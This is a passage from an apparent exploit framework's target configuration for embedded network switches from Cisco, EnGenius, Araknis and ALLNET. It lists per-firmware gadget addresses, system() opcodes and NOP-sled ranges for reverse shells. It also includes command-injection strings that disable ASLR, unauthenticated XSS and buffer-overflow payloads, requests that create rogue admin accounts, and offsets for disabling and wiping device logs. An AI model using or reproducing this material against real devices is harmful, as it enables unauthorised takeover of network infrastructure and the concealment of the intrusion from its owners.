# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x4350D8,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'225-60080': {
'template':'Cisco',# Static for the vendor
'version':'1.1.4.1',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40ffac,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998530,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24847b6c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()
# Ping IPv4
'web_sys_ping_post':0x43535C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
'sys_ping_post_check':'',

# /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()
# traceroute
#'web_sys_ping_post':0x43567C,# Jump one after 'sw $ra'# (address, binary dependent)
#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
#'sys_ping_post_check':'',

'verify_uri':'/tmp/check',
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x436FDC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x436F34,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x436F88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
'sys_timeSntp_set':0x434FB0,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x4350D8,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# EnGenius Technologies, Inc.
# EGS series
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'14044-509': {
'template':'EnGenius',# Static for the vendor
'version':'1.05.20_150810-1754',# Version / binary dependent stuff
'model':'EGS2110P',# Model
'uri':'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E12C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248405a0,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42382C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',

'vulnerable': True,# 
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x423E74,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x423E74,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',# 
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x43DE18,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x43F934,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x43F934,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x424844,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x424844,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'START':0x100181A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# EnGenius Technologies, Inc.
# EWS series
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'14044-32589': {
'template':'EnGenius',# Static for the vendor
'version':'1.06.21_c1.8.77_180906-0716',# Version / binary dependent stuff
'model':'EWS1200-28TFP',# Model
'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
'verify': { 
'cpl_locallogin.cgi (XSS)': {
'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login (XSS)': {
'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_logo_ul.cgi': {
'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
'authenticated': False,
'response':'json',
'Content-Type':False,
'uri':'/cgi-bin/cpl_logo_ul.cgi',
'content':'Content-Disposition: filename.png\n------',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_locallogin.cgi': {
'description':'Stack overflow in "username/password (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
'content':'username=admin&password=' + self.random_string(196),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login': {
'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.jrpc.dispatch.cgi': {
'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.auth': {
'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
'content':'',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E15C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24840690,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x42D1D4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x42D1D4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',# 
'vulnerable': True,# 
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42CB8C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',

'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x4494E8,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x44B0C0,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x44B0C0,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42E438,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x42E438,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x100271A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'14044-44104': {
'template':'EnGenius',# Static for the vendor
'version':'1.07.22_c1.9.21_181018-0228',# Version / binary dependent stuff
'model':'EWS1200-28TFP',# Model
'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
'verify': { 
'cpl_locallogin.cgi (XSS)': {
'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login (XSS)': {
'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_logo_ul.cgi': {
'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
'authenticated': False,
'response':'json',
'Content-Type':False,
'uri':'/cgi-bin/cpl_logo_ul.cgi',
'content':'Content-Disposition: filename.png\n------',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_locallogin.cgi': {
'description':'Stack overflow in "username/password (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
'content':'username=admin&password=' + self.random_string(196),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login': {
'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.jrpc.dispatch.cgi': {
'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.auth': {
'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
'content':'',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E15C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24840690,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x42C334,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x42C334,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',# 
'vulnerable': True,# 
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42BCEC,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',

'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x448008,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x449BE0,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x449BE0,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42D598,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntpDel_set':0x42D598,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x100271A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Araknis Networks
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'8028-89928': {
'template':'Araknis',# Static for the vendor
'version':'1.2.00_171225-1618',# Version / binary dependent stuff
'model':'AN-310-SW-16-POE',# Model
'uri':'http://araknisnetworks.com/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x24840470,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': False, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42A494,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',

'vulnerable': True,# 
},
'stack_cgi_add_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_EncrypOnly_user_mngSet()
'address':0x4303B4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()
'address':0x42ADB8,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=&pv=0&op=0',# 
'vulnerable': True,# user
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x44DBD8,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x44FC88,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x44FC88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42BAE4,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntpDel_set':0x42BAE4,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00
'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x10010104,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP': 0x10600604,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# ALLNET GmbH Computersysteme 
# JSON based SG8xxx
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'752-76347': {
'model':'ALL-SG8208M',
'template':'ALLNET_JSON',# Static for the vendor
'version':'2.2.1',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40C4FC,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998528,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x248498dc,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)

'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x412ADC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x412A24,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x412A24,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntp_set':0x40FA74,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSntpDel_set':0x40FA74,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
'sys_timeSettings_set':0x40FA74,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# ALLNET GmbH Computersysteme 
# Not JSON based SG8xxx
# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'222-50100': {
'template':'ALLNET',# Static for the vendor
'version':'3.1.1-R3-B1',# Version / binary dependent stuff
'model':'ALL-SG8310PM',# Model
'uri':'https://www.allnet.de/en/allnet-brand/produkte/switches/entry-line-layer2-smart-managed-unamanged/poe-switches0/p/allnet-all-sg8310pm-smart-managed-8-port-gigabit-4x-hpoe',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40C74C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484029c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x46BB04,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x46F240,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x46F240,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x426724,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
